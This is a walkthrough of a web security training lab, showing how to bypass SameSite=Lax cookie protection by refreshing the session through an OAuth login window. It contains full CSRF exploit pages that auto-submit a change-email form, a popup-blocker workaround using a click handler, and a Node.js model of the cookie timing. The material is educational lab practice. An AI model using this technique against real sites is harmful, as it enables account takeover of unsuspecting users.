
LAB 10 - SameSite Lax bypass via cookie refresh

Initial instructions

This lab's change email function is vulnerable to CSRF. To solve the lab, perform a CSRF attack that changes the victim's email address. You should use the provided exploit server to host your attack.

The lab supports OAuth-based login. You can log in via your social media account with the following credentials: wiener:peter

First, log in with the wiener:peter credentials, try to update the account's email address, and intercept that request with Burp Suite.


Now I generate a CSRF PoC from the intercepted request and deliver it to the victim from the exploit server.


Delivering it to the victim does not solve the lab: the session cookie is not sent with our cross-site POST, because the cookie has no SameSite attribute and Chrome treats such cookies as SameSite=Lax by default. We need to bypass that restriction.

Visiting /social-login automatically kicks off the full OAuth flow and, at the end of it, the lab sets a new session cookie even if we were already logged in. That matters because of how Chrome's Lax-by-default rule works: a cookie with no SameSite attribute is treated as Lax, but it is still sent on top-level POST requests for the first two minutes after it was set (the "Lax + POST" exception). If our page refreshes the cookie and then submits the form inside that window, the fresh cookie travels with the cross-site POST. So, on the exploit server, we extend the original CSRF PoC with the following, which opens /social-login in a new window and waits 5 seconds for the redirect chain to finish before submitting the form:

<script>
    // re-run the OAuth flow in a new window so the lab issues a fresh session cookie
    window.open('https://YOUR-LAB-ID.web-security-academy.net/social-login');
    // give the redirects time to finish, then submit the cross-site POST
    // while the new cookie is still inside the two-minute Lax+POST window
    setTimeout(changeEmail, 5000);

    function changeEmail(){
        document.forms[0].submit();
    }
</script>

The complete exploit page now looks like this.

<html>
  <!-- CSRF PoC - generated by Burp Suite Professional -->
  <body>
    <form action="https://0a7d00ff0418a23d80814e32005d0044.web-security-academy.net/my-account/change-email" method="POST">
      <input type="hidden" name="email" value="test@hacked.net" />
      <input type="submit" value="Submit request" />
    </form>
<script>
    // re-run the OAuth flow in a new window so the lab issues a fresh session cookie
    window.open('https://0a7d00ff0418a23d80814e32005d0044.web-security-academy.net/social-login');
    // give the redirects time to finish, then submit the cross-site POST
    // while the new cookie is still inside the two-minute Lax+POST window
    setTimeout(changeEmail, 5000);

    function changeEmail(){
        document.forms[0].submit();
    }
</script>
  </body>
</html>
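To make the timing behind the cookie refresh concrete, here is a small Node.js model of the cookie rules involved. It is an added example, not code from the lab or from this write-up, and it is a deliberate simplification of Chrome's documented Lax-by-default behaviour: the 120-second figure is Chrome's, while the function names, field names and timeline values are my own assumptions. It shows that the cross-site POST carries the session cookie only when the cookie has no explicit SameSite attribute and was set within the last two minutes, which is exactly the window the /social-login refresh creates, and that an explicit SameSite=Lax on the cookie would defeat the trick.

```javascript
// Added example: simplified model of Chrome's SameSite cookie rules.
// Not browser code; thresholds and names are assumptions for illustration.
const LAX_POST_GRACE_SECONDS = 120; // Chrome's "Lax + POST" window for cookies with no SameSite attribute

// cookie:  { name, sameSite: 'Strict' | 'Lax' | 'None' | undefined, setAtSeconds }
// request: { method, crossSite: boolean, topLevel: boolean, nowSeconds }
// Returns true if the browser would attach the cookie to the request.
function cookieIsSent(cookie, request) {
  if (!request.crossSite) return true;      // same-site requests always carry the cookie

  const mode = cookie.sameSite;
  if (mode === 'None') return true;          // explicit None (the Secure requirement is not modelled)
  if (mode === 'Strict') return false;       // never sent on cross-site requests

  // Lax, explicit or defaulted: only top-level navigations with safe methods.
  if (!request.topLevel) return false;
  const safe = ['GET', 'HEAD', 'OPTIONS', 'TRACE'].includes(request.method.toUpperCase());
  if (safe) return true;

  // Unsafe method (POST). Explicit Lax blocks it outright. Defaulted Lax gets
  // the two-minute grace period, which is what the cookie refresh exploits.
  if (mode === 'Lax') return false;
  const age = request.nowSeconds - cookie.setAtSeconds;
  return age >= 0 && age < LAX_POST_GRACE_SECONDS;
}

// Walk through the lab's timeline (constructed values): the victim logged in at
// t=0, lands on the attacker's page an hour later, the page optionally opens
// /social-login (which issues a fresh cookie), then submits the cross-site POST
// `delaySeconds` later. Returns whether that POST carried the session cookie.
function simulateAttack({ refreshCookie, delaySeconds, sameSite }) {
  let session = { name: 'session', sameSite, setAtSeconds: 0 };
  let now = 3600;
  if (refreshCookie) {
    session = { ...session, setAtSeconds: now }; // /social-login sets a new cookie
  }
  now += delaySeconds;
  return cookieIsSent(session, { method: 'POST', crossSite: true, topLevel: true, nowSeconds: now });
}

// Stand-alone demonstration of the scenarios from the write-up.
console.log('plain CSRF PoC, stale cookie:        ', simulateAttack({ refreshCookie: false, delaySeconds: 5, sameSite: undefined }));
console.log('refresh then submit after 5 s:        ', simulateAttack({ refreshCookie: true, delaySeconds: 5, sameSite: undefined }));
console.log('refresh then submit after 130 s:      ', simulateAttack({ refreshCookie: true, delaySeconds: 130, sameSite: undefined }));
console.log('refresh, cookie has explicit Lax:     ', simulateAttack({ refreshCookie: true, delaySeconds: 5, sameSite: 'Lax' }));
```

The model also explains the choice of a 5-second delay in the exploit: it has to be long enough for the OAuth redirects to complete and set the cookie, but comfortably shorter than the 120-second window after which the defaulted-Lax cookie is withheld from cross-site POSTs again.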

If we view the exploit ourselves, we see that the call to window.open() is blocked by the browser's popup blocker.


Bypassing this is simple. The popup is blocked because window.open() ran without any user interaction with the page; browsers only allow popups opened from a handler for a user gesture such as a click. So we tweak the exploit to prompt the victim to click, and move the window.open() call (together with the delayed form submission) into a click handler.

This is how I do it:

<p>Click anywhere on the page</p>
<script>
    window.onclick = () => {
        // opened from a click handler, so the popup blocker allows it
        window.open('https://YOUR-LAB-ID.web-security-academy.net/social-login');
        setTimeout(changeEmail, 5000);
    }

    function changeEmail(){
        document.forms[0].submit();
    }
</script>

The full exploit page is now:

<html>
  <!-- CSRF PoC - generated by Burp Suite Professional -->
  <body>
    <form action="https://0a7d00ff0418a23d80814e32005d0044.web-security-academy.net/my-account/change-email" method="POST">
      <input type="hidden" name="email" value="hacked@astro.xyz" />
      <input type="submit" value="Submit request" />
    </form>
<p>Click anywhere on the page</p>
<script>
    window.onclick = () => {
        // re-run the OAuth flow in a new window so the lab issues a fresh session cookie;
        // the click handler is what gets this past the popup blocker
        window.open('https://0a7d00ff0418a23d80814e32005d0044.web-security-academy.net/social-login');
        // give the redirects time to finish, then submit the cross-site POST
        // while the new cookie is still inside the two-minute Lax+POST window
        setTimeout(changeEmail, 5000);
    }

    function changeEmail(){
        document.forms[0].submit();
    }
</script>
  </body>
</html>

Now let's deliver it to the victim.


Congratulations, you solved the lab!